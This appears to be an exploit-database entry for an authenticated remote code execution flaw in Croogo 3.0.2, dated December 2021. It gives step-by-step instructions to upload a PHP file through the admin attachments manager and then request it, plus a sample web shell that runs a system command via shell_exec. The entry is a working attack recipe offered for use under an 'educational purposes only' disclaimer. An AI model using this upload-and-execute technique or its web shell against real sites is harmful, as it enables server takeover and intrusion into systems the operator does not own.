Exploits / Vulnerability Discovered : 2021-12-06 |
Type : webapps |
Platform : php
This exploit / vulnerability Croogo 3.0.2 remote code execution (authenticated) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Croogo 3.0.2 - Remote Code Execution (Authenticated)
# Date: 05/12/2021
# Exploit Author: Deha Berkin Bir
# Vendor Homepage: https://croogo.org/
# Software Link: https://downloads.croogo.org/v3.0.2.zip
# Version: 3.0.2
# Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3
==> Tutorial <==
1- Login with your privileged account.
2- Go to the 'Attachments' section. Directory is '/admin/file-manager/attachments'.
3- Click the 'New Attachment' button.
4- Choose a malicious php script and upload it.
########### EXAMPLE SOURCE CODE OF MALICIOUS PHP SCRIPT ####################
<?php
$command = shell_exec('netstat -an');
echo "<pre>$command</pre>";
?>
############################################################################
5- Click on the URL of malicious php script you uploaded.
6- The malicious PHP script will be executed.